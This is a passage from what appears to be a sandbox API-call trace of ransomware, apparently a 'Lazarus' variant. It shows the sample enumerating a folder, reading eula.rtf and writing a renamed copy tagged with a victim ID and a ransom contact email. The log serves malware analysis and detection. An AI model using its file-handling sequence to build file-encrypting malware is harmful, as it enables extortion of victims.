| out: hHeap=0x20000) returned 1 [0069.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.891] AreFileApisANSI () returned 1 [0069.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1046", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1046", lpUsedDefaultChar=0x0) returned 27 [0069.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.958] AreFileApisANSI () returned 1 [0069.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78410 [0069.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x78410, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046") returned 27 [0069.958] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046" (normalized: "c:\\588bce7c90097ed212\\1046"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.958] GetLastError () returned 0x5 [0069.958] GetLastError () returned 0x5 [0069.958] SetLastError (dwErrCode=0x5) [0069.958] GetLastError () returned 0x5 [0069.958] SetLastError (dwErrCode=0x5) [0069.958] GetLastError () returned 0x5 [0069.958] SetLastError (dwErrCode=0x5) [0069.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78410 | out: hHeap=0x20000) returned 1 [0069.959] AreFileApisANSI () returned 1 [0069.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x783d0 [0069.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x783d0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046") returned 27 [0069.959] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046" (normalized: "c:\\588bce7c90097ed212\\1046"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.959] GetLastError () returned 0x5 [0069.959] GetLastError () returned 0x5 [0069.959] SetLastError (dwErrCode=0x5) [0069.959] GetLastError () returned 0x5 [0069.959] SetLastError (dwErrCode=0x5) [0069.959] GetLastError () returned 0x5 [0069.959] SetLastError (dwErrCode=0x5) [0069.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x783d0 | out: hHeap=0x20000) returned 1 [0069.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0069.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0069.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0069.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0069.959] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1049", cAlternateFileName="")) returned 1 [0069.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0069.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0069.960] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78290 [0069.960] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.960] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a98 [0069.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0069.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0069.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0069.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.961] AreFileApisANSI () returned 1 [0069.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1046\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0069.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0069.961] AreFileApisANSI () returned 1 [0069.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0069.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 36 [0069.961] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.961] GetFileType (hFile=0x418) returned 0x1 [0069.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0069.962] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0069.962] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0069.962] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0069.962] CloseHandle (hObject=0x418) returned 1 [0069.962] AreFileApisANSI () returned 1 [0069.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0069.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 36 [0069.962] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.963] GetFileType (hFile=0x418) returned 0x1 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0069.963] CloseHandle (hObject=0x418) returned 1 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.964] AreFileApisANSI () returned 1 [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 36 [0069.964] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63)) returned 1 [0069.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0069.964] AreFileApisANSI () returned 1 [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0069.964] GetLastError () returned 0x0 [0069.964] SetLastError (dwErrCode=0x0) [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0069.964] GetLastError () returned 0x0 [0069.964] SetLastError (dwErrCode=0x0) [0069.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0069.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0069.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0069.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0069.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0069.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.965] AreFileApisANSI () returned 1 [0069.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0069.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0069.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0069.965] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.967] GetFileType (hFile=0x418) returned 0x1 [0069.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0069.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0069.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.967] AreFileApisANSI () returned 1 [0069.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0069.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 36 [0069.968] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.968] GetFileType (hFile=0x428) returned 0x1 [0069.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0069.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0069.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.968] GetLastError () returned 0x0 [0069.968] SetLastError (dwErrCode=0x0) [0069.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.968] GetLastError () returned 0x0 [0069.968] SetLastError (dwErrCode=0x0) [0069.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0069.968] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0xe63, lpOverlapped=0x0) returned 1 [0069.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0069.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0069.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.970] GetLastError () returned 0x0 [0069.970] SetLastError (dwErrCode=0x0) [0069.970] GetLastError () returned 0x0 [0069.970] SetLastError (dwErrCode=0x0) [0069.970] GetLastError () returned 0x0 [0069.970] 